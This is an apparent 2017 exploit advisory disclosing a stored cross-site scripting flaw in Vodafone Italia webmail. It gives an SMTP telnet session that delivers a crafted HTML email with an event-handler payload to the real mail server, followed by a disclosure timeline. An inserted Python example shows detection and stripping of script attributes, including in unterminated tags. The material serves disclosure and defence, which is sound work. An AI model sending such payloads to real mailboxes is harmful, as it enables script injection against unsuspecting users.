Vodafone Italia Webmail Cross Site Scripting

Vodafone Italia's webmail system suffers from a cross site scripting vulnerability that can be leveraged via an incoming email.

MD5 | d0d7db3a1272f4db6715ac4f88d6f69f

# Title: Vodafone Webmail - Stored Cross-Site Scripting
# Date: 2017-07-14
# Exploit Author: theMiddle / https://github.com/theMiddleBlue
# Website: https://web.mail.vodafone.it

1. Description
The Vodafone Italia webmail (web.mail.vodafone.it) suffers from a
stored cross-site scripting vulnerability. The webmail's XSS filter can be
bypassed, and the vulnerability exploited, by sending the target an e-mail
message in the specific format shown below.

After years of no answer from Vodafone, I decided to disclose it in order
to alert users and companies that use this webmail.

2. Exploit vulnerability
# telnet mx.vodafone.arubamail.it 25
Connected to mx.vodafone.arubamail.it.
Escape character is '^]'.
220 mxcmd02.vf.aruba.it bizsmtp ESMTP server ready
HELO example.com
250 mxcmd02.vf.aruba.it hello [*****], pleased to meet you
MAIL FROM: [email protected]
250 2.1.0 <[email protected]> sender ok
RCPT TO: *****@vodafone.it
250 2.1.5 <*****@vodafone.it> recipient ok
DATA
354 enter mail, end with "." on a line by itself
Subject: test xss
From: theMiddle <[email protected]>
To: *****@vodafone.it
Content-Type: text/html; charset=utf-8

<div onmouseover

.
250 2.0.0 kJLA1v0060an1Af01JLXCz mail accepted for delivery
221 2.0.0 mxcmd02.vf.aruba.it bizsmtp closing connection
Connection closed by foreign host.

A screenshot of the JavaScript executing in the Chrome browser:
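The message in the transcript is accepted by the MTA as ordinary text/html mail, so the only place to catch the payload is on the receiving side, before the webmail renders the body. The following Python example is added here and is not code from the advisory or from Vodafone: it parses a constructed message in the same format (sender, recipient and the full payload `<div onmouseover=alert(1)>` are placeholders, since the advisory shows only `<div onmouseover`), then runs two checks over the HTML part. The first, `naive_flags`, only inspects well-formed tags and therefore never sees a tag that the sender left unterminated; the second scans every `<tag ...` span up to the next `<` or `>` whether or not it was closed, and `strip_script_attributes` removes the offending attributes the same way. Neither filter is a reconstruction of the webmail's own filter; the pair illustrates the general point that an HTML mail body is attacker-controlled text which may be completed by whatever markup the webmail wraps around it, so a filter must not assume the body it sees is well-formed.

```python
"""Inbound-mail check for script-bearing HTML attributes.

Added example, not code from the advisory or from Vodafone.  The message,
the payload and the two filters below are constructed for illustration;
they do not reproduce the webmail's actual filter.
"""
import re
from email import message_from_bytes, policy

# Constructed raw message in the format of the SMTP transcript (assumption:
# addresses and the full payload are placeholders; the advisory truncates it).
RAW_MESSAGE = b"""Subject: test xss
From: theMiddle <sender@example.com>
To: victim@example.net
Content-Type: text/html; charset=utf-8

<p>hello</p>
<div onmouseover=alert(1)>hover me</div>
<a href="javascript:alert(2)">link</a>
"""

# Constructed body whose last tag is never closed by the sender, as in the
# advisory's `<div onmouseover` line.
UNTERMINATED = "<p>hi</p>\n<div onmouseover=alert(1)"


def html_part(raw: bytes) -> str:
    """Return the decoded text/html body of a raw RFC 5322 message ('' if none)."""
    msg = message_from_bytes(raw, policy=policy.default)
    part = msg.get_body(preferencelist=("html",))
    return part.get_content() if part is not None else ""


# A filter that only looks inside well-formed tags: it requires the closing '>'.
NAIVE = re.compile(r"<[a-zA-Z][^>]*\bon[a-zA-Z]+\s*=[^>]*>", re.I)


def naive_flags(html: str) -> bool:
    """True if a closed tag carries an on* attribute; misses unterminated tags."""
    return NAIVE.search(html) is not None


# Tolerant scan: a tag-like span runs from '<name' up to the next '<' or '>',
# so a tag with no '>' at all is still inspected.
TAG_LIKE = re.compile(r"<([a-zA-Z][a-zA-Z0-9-]*)([^<>]*)")
# on* event-handler attributes, quoted or unquoted (value optional).
EVENT_ATTR = re.compile(r"""\s+(on[a-zA-Z]+)\s*=\s*("[^"]*"|'[^']*'|[^\s"'<>]+)?""", re.I)
# URL attributes whose value starts with a javascript: scheme.
URL_ATTR = re.compile(
    r"""\s+(href|src|action|formaction)\s*=\s*(["']?)\s*javascript:[^"'\s<>]*\2""", re.I
)


def find_script_attributes(html: str) -> list[tuple[str, str]]:
    """Return (tag, attribute) pairs for every event handler or javascript: URL,
    including those inside tags the sender never closed."""
    found = []
    for m in TAG_LIKE.finditer(html):
        tag, attrs = m.group(1).lower(), m.group(2)
        found += [(tag, a.group(1).lower()) for a in EVENT_ATTR.finditer(attrs)]
        found += [(tag, a.group(1).lower()) for a in URL_ATTR.finditer(attrs)]
    return found


def strip_script_attributes(html: str) -> str:
    """Drop those attributes from every tag-like span; everything else is kept."""
    def clean(m: re.Match) -> str:
        attrs = EVENT_ATTR.sub("", m.group(2))
        attrs = URL_ATTR.sub("", attrs)
        return "<" + m.group(1) + attrs
    return TAG_LIKE.sub(clean, html)


if __name__ == "__main__":
    body = html_part(RAW_MESSAGE)
    print("closed tags, naive filter flags:", naive_flags(body))
    print("closed tags, tolerant scan finds:", find_script_attributes(body))
    print("unterminated tag, naive filter flags:", naive_flags(UNTERMINATED))
    print("unterminated tag, tolerant scan finds:", find_script_attributes(UNTERMINATED))
    print("sanitised body:\n" + strip_script_attributes(body))
```

The regexes are deliberately small so the difference between the two filters is visible; for a real gateway or webmail, an allowlist-based HTML sanitiser (only known-safe tags and attributes survive, everything else is dropped or escaped) is the right tool, and it should be run on the body exactly as it will be embedded in the page, not on the raw MIME part alone.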

3. Timeline
2014-10-31: Initial report to abuse Vodafone e-mail address (no answer received).
2015-06-25: Second contact via social network (no answer received).
2017-07-13: Third e-mail to [email protected] (no answer received).
2017-07-14: Disclosure.
